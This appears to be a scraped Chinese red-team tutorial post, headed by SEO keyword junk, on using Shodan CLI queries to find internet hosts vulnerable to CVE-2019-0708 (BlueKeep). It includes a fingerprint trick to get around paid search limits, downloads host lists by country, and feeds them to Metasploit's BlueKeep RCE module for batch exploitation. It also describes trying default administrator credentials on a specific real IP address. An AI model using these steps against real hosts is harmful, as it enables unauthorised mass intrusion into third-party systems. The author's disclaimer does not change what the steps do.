百度验证网站所有权,滨州网站建设hskj360,wordpress访问量,wordpress菜单右上角shodan2
shodanmetasploit批量验证漏洞
shodan的这个指令语法是特别多的#xff0c;那么我不可能说一个个全部讲完#xff0c;因为有的参数可能你一辈子都用不上#xff0c;主要就是把一些红队最常用的参数给你讲完#xff0c;今天我们看看怎么去查一个cve-2019-0708的一…shodan2
shodanmetasploit批量验证漏洞
shodan的这个指令语法是特别多的那么我不可能说一个个全部讲完因为有的参数可能你一辈子都用不上主要就是把一些红队最常用的参数给你讲完今天我们看看怎么去查一个cve-2019-0708的一个漏洞
shodan search --limit 10 --fields ip_str,port /x03/x00/x00/x0b/x06/xd0/x00/x00/x124/x00
十六进制字符串(类似于指纹的方式去找)绕过shodan高级会员限制
只有高级账号才能用vuln参数但是如果不能使用vuln参数也可以通过发散思维来到达同样的结果比如上面通过指纹在比如我们指定3389端口然后使用has_vuln:True参数确定必须有漏洞这样大概率有cve-2019-0708的一个漏洞当然了再加上个关键字port:3389 Remote Desktop Protocol os:windows就更加准确了
shodan search --limit 10 --fields ip_str,port port:3389 Remote Desktop Protocol os:windows has_vuln:True![[Pasted image 20241027022845.png]] 如果可以使用vuln参数可以直接使用
shodan download --limit 100 --fields ip_str vuln:CVE-2019-0708 country:jpmetasploit批量验证漏洞
有漏洞不代表能利用用windows远程连接看看主机是否存活110.35.235.228远程链接出现测试弱口令AdministratorAdministrator,无法连接不过没事。我们可以使用metasploit去进行批量的漏洞利用
search 0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set rhosts file:拖入IP地址文件
checkshow targets(查看帮助文档)![[Pasted image 20241027012246.png]] 攻击不成功有几个点给大家说一下首先show options看请我们的这个pay load,ip端口要填对在一个就是show targets它支持windows7,sever这种你得把targets设置正确然后我就不演示了。怕有人干坏事好吧这样找漏洞是不是特别的方便呢。
shodan语法parse、downIoad
今天接着讲两个参数一个是parse一个是downIoad(下载) 我们首先看看这个downIoad
download下载
查看帮助文档 shodan download -hUsage: shodan download [OPTIONS] filename search queryDownload search results and save them in a compressed JSON file.Options:--fields TEXT Specify the list of properties to download instead ofgrabbing the full banner--limit INTEGER The number of results you want to download. -1 to downloadall the data possible.-h, --help Show this message and exit.
使用实例
shodan download [OPTIONS] filename search query
shodan download 文件名 搜索查询 [选项]shodan download 0708 --limit 10 --fields ip_str,port /x03/x00/x00/x0b/x06/xd0/x00/x00/x124/x00
0708是文件名有钱的直接使用vuln参数就行
shodan download cve-2019-0708 --limit 10 vuln:CVE-2019-0708![[Pasted image 20241026230154.png]]
parse解压
shodan parse -h(查看帮助文档)Usage: shodan parse [OPTIONS] filenamesExtract information out of compressed JSON files.Options:--color / --no-color--fields TEXT List of properties to output.-f, --filters TEXT Filter the results for specific values using key:valuepairs.-O, --filename TEXT Save the filtered results in the given file (append iffile exists).--separator TEXT The separator between the properties of the searchresults.-h, --help Show this message and exit.
使用
shodan parse --fields ip_str 文件名shodan parse --fields ip_str /home/kali/桌面/cve-2019-0708.json.gz 07080708表示将解压内容输入到0708文件里面这就是一个批量刷漏洞的姿势好吧希望大家遵纪守法 为什么不用shodan search vuln:cve-2019-0708这种可能是说要更高级别的账号好吧我们换种方式照样绕过它去批量刷洞
参考
【shodan(2)】https://www.bilibili.com/video/BV1ePyDYEE9b?vd_source6a7d9c477e11fffc54155ce1c6cf0c1c